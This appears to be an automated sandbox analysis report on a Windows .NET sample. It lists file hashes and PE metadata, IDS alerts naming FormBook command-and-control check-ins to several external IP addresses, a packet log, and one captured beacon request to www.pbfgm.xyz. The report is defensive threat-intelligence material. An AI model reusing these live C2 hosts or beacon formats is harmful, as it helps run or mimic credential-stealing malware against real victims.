                                                                                                    SHA512:3872c3f2a9e184b91c6bb566f51756bfc8b5060e35ee85520f697718d06681126bfb35223c5de0eb1a17d21e35f82265debd130a4e4e8eb3c2552ccc154edd7f
                                                                                                    SSDEEP:12288:KIR4R52J+Xt6+5O0RAk+KwHq34jDari3/i+RWcq11aSI9d1xY/bbgDbMc6VtIRi:KIeeL+RAk+KeQ4Se/twB18SI9d1xibg8
                                                                                                    TLSH:D4F412286A17D407CA9157780EB3F27466AC5FDDEA0093235FEDBEABF836D144C94281
                                                                                                    Icon Hash:033424c4c199d839
                                                                                                    Entrypoint:0x4b749a
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x674E65C3 [Tue Dec 3 01:58:27 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7448 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb54a0 | 0xb5800 | 017d1cbe7bc68fc61c53df23dba9f2dc | False | 0.9385586152720385 | data | 7.812825640175082 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x4ca8 | 0x5000 | 29d46f9e9ce50644c63a3b0bac3d2e73 | False | 0.917724609375 | data | 7.66720644150444 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x400 | e9ce0413dd05ab12838773bfc2ee20e0 | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb8100 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094
RT_GROUP_ICON | 0xbc80c | 0x14 | data | | | 1.05
RT_VERSION | 0xbc830 | 0x278 | data | | | 0.4699367088607595
RT_MANIFEST | 0xbcab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T14:15:52.396161+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49713 | 172.67.218.146 | 80 | TCP
2024-12-03T14:15:52.396161+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49713 | 172.67.218.146 | 80 | TCP
2024-12-03T14:16:09.697614+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49714 | 178.172.160.30 | 80 | TCP
2024-12-03T14:16:12.321713+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49715 | 178.172.160.30 | 80 | TCP
2024-12-03T14:16:15.032437+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49716 | 178.172.160.30 | 80 | TCP
2024-12-03T14:16:17.694627+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49717 | 178.172.160.30 | 80 | TCP
2024-12-03T14:16:17.694627+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49717 | 178.172.160.30 | 80 | TCP
2024-12-03T14:16:24.651040+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49718 | 194.58.112.174 | 80 | TCP
2024-12-03T14:16:27.379763+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49719 | 194.58.112.174 | 80 | TCP
2024-12-03T14:16:30.070445+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49720 | 194.58.112.174 | 80 | TCP
2024-12-03T14:16:32.676062+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49721 | 194.58.112.174 | 80 | TCP
2024-12-03T14:16:32.676062+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49721 | 194.58.112.174 | 80 | TCP
2024-12-03T14:16:40.180012+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49722 | 134.122.191.187 | 80 | TCP
2024-12-03T14:16:42.851950+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49723 | 134.122.191.187 | 80 | TCP
2024-12-03T14:16:45.554922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49724 | 134.122.191.187 | 80 | TCP
2024-12-03T14:16:48.425225+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49725 | 134.122.191.187 | 80 | TCP
2024-12-03T14:16:48.425225+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49725 | 134.122.191.187 | 80 | TCP
2024-12-03T14:16:56.414347+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49726 | 156.234.28.101 | 80 | TCP
2024-12-03T14:16:59.070611+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49727 | 156.234.28.101 | 80 | TCP
2024-12-03T14:17:01.749095+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49728 | 156.234.28.101 | 80 | TCP
2024-12-03T14:17:04.451571+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49729 | 156.234.28.101 | 80 | TCP
2024-12-03T14:17:04.451571+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49729 | 156.234.28.101 | 80 | TCP
2024-12-03T14:17:11.302027+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49730 | 209.74.79.42 | 80 | TCP
2024-12-03T14:17:13.915538+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49731 | 209.74.79.42 | 80 | TCP
2024-12-03T14:17:16.650100+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49732 | 209.74.79.42 | 80 | TCP
2024-12-03T14:17:19.301185+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49733 | 209.74.79.42 | 80 | TCP
2024-12-03T14:17:19.301185+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49733 | 209.74.79.42 | 80 | TCP
2024-12-03T14:17:26.277793+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49734 | 208.91.197.27 | 80 | TCP
2024-12-03T14:17:28.977442+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49735 | 208.91.197.27 | 80 | TCP
2024-12-03T14:17:31.687756+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49736 | 208.91.197.27 | 80 | TCP
2024-12-03T14:17:34.812705+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49737 | 208.91.197.27 | 80 | TCP
2024-12-03T14:17:34.812705+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49737 | 208.91.197.27 | 80 | TCP
2024-12-03T14:17:42.176033+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49738 | 185.101.158.113 | 80 | TCP
2024-12-03T14:17:44.847594+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49739 | 185.101.158.113 | 80 | TCP
2024-12-03T14:17:47.540609+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49740 | 185.101.158.113 | 80 | TCP
2024-12-03T14:17:50.260075+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49741 | 185.101.158.113 | 80 | TCP
2024-12-03T14:17:50.260075+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49741 | 185.101.158.113 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                    Dec 3, 2024 14:16:16.361067057 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:16.481086969 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:17.694446087 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:17.694530010 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:17.694627047 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:17.697212934 CET4971780192.168.2.8178.172.160.30
                                                                                                    Dec 3, 2024 14:16:17.818075895 CET8049717178.172.160.30192.168.2.8
                                                                                                    Dec 3, 2024 14:16:23.197443962 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:23.317433119 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:23.317528963 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:23.333029985 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:23.452996016 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:24.650866032 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:24.650974989 CET8049718194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:24.651040077 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:24.836127996 CET4971880192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:25.883570910 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:26.003599882 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:26.003707886 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:26.050920963 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:26.171634912 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:27.379477024 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:27.379671097 CET8049719194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:27.379762888 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:27.554896116 CET4971980192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.574145079 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.694154024 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:28.694309950 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.709522963 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:28.829608917 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:28.829694986 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:30.021274090 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:30.070445061 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:30.144243956 CET8049720194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:30.144408941 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:30.211180925 CET4972080192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.229886055 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.349987984 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:31.350087881 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.360243082 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:31.480357885 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:32.675774097 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:32.675900936 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:32.676062107 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:32.678822041 CET4972180192.168.2.8194.58.112.174
                                                                                                    Dec 3, 2024 14:16:32.798881054 CET8049721194.58.112.174192.168.2.8
                                                                                                    Dec 3, 2024 14:16:38.537513971 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:38.658776045 CET8049722134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:38.659039974 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:38.673286915 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:38.793514013 CET8049722134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:40.180011988 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:40.302593946 CET8049722134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:40.302661896 CET4972280192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.198693037 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.318679094 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:41.318850040 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.339796066 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:41.459849119 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.851949930 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.922683954 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.922770977 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.922776937 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.922806978 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.922873020 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.922873020 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.923572063 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.923619032 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.923634052 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.923713923 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:42.971849918 CET8049723134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:42.971950054 CET4972380192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:43.871476889 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:43.991590977 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:43.991703033 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:44.039673090 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:44.163043022 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:44.163089037 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.554922104 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596532106 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596702099 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596708059 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596709013 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596822977 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596822977 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596829891 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.596879959 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.596879959 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.600630999 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:45.679457903 CET8049724134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:45.679816961 CET4972480192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.573740959 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.695359945 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:46.695455074 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.707627058 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:46.827804089 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.424956083 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.424982071 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.424997091 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.425044060 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:48.425225019 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:48.425225019 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:48.429860115 CET4972580192.168.2.8134.122.191.187
                                                                                                    Dec 3, 2024 14:16:48.549803019 CET8049725134.122.191.187192.168.2.8
                                                                                                    Dec 3, 2024 14:16:54.754411936 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:54.874861002 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:54.874994993 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:54.913216114 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:55.033225060 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.414346933 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:56.493078947 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.493153095 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:56.493221045 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.493289948 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:56.534518957 CET8049726156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:56.534594059 CET4972680192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.433048010 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.552982092 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:57.553062916 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.568144083 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:57.688709974 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.070611000 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:59.136734009 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.136833906 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.136876106 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:59.136908054 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:16:59.190628052 CET8049727156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:16:59.190773964 CET4972780192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.089891911 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.211733103 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:00.211905003 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.226274014 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:00.346688032 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:00.346710920 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.749094963 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:01.784885883 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.784934044 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.784967899 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:01.785001040 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:01.869281054 CET8049728156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:01.869343996 CET4972880192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:02.761009932 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:02.881238937 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:02.881496906 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:02.890991926 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:03.011372089 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451384068 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451414108 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451425076 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:04.451570988 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:04.464138031 CET4972980192.168.2.8156.234.28.101
                                                                                                    Dec 3, 2024 14:17:04.584080935 CET8049729156.234.28.101192.168.2.8
                                                                                                    Dec 3, 2024 14:17:09.910167933 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:10.030283928 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:10.030417919 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:10.043855906 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:10.211277008 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:11.301911116 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:11.301923990 CET8049730209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:11.302026987 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:11.554863930 CET4973080192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.573422909 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.693851948 CET8049731209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:12.693998098 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.707151890 CET4973180192.168.2.8209.74.79.42
                                                                                                    Dec 3, 2024 14:17:12.827756882 CET8049731209.74.79.42192.168.2.8
                                                                                                    Dec 3, 2024 14:17:13.915189028 CET8049731209.74.79.42192.168.2.8
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49713 | 172.67.218.146 | 80 | 5268 | C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:15:50.817111969 CET | 558 | OUT | GET /fjd6/?uZ9=wvL0WTq0tnld4P&1JgHkl=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2HRrufKZisD26p6RGVEvaASN7Xi+5siy6qQN86qnR0uMGQ== HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.pbfgm.xyz
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 3, 2024 14:15:52.395817041 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:15:52 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wglKkYd8WMmpy7vQ8L2rxbNGVU1FbJVBLRd%2BqdmuFtWpsdST8LcQd7Zb%2B7f6yDmdDr3JwzrGrfeBTlevNKyYTHz2A6t2b0KrDYHhh44DEMcFrolyMX%2FTq3PnFFvKA9Y%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ec3d3f06b704233-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                    Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
Dec 3, 2024 14:15:52.395853996 CET | 92 | IN |
                                                                                                    Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


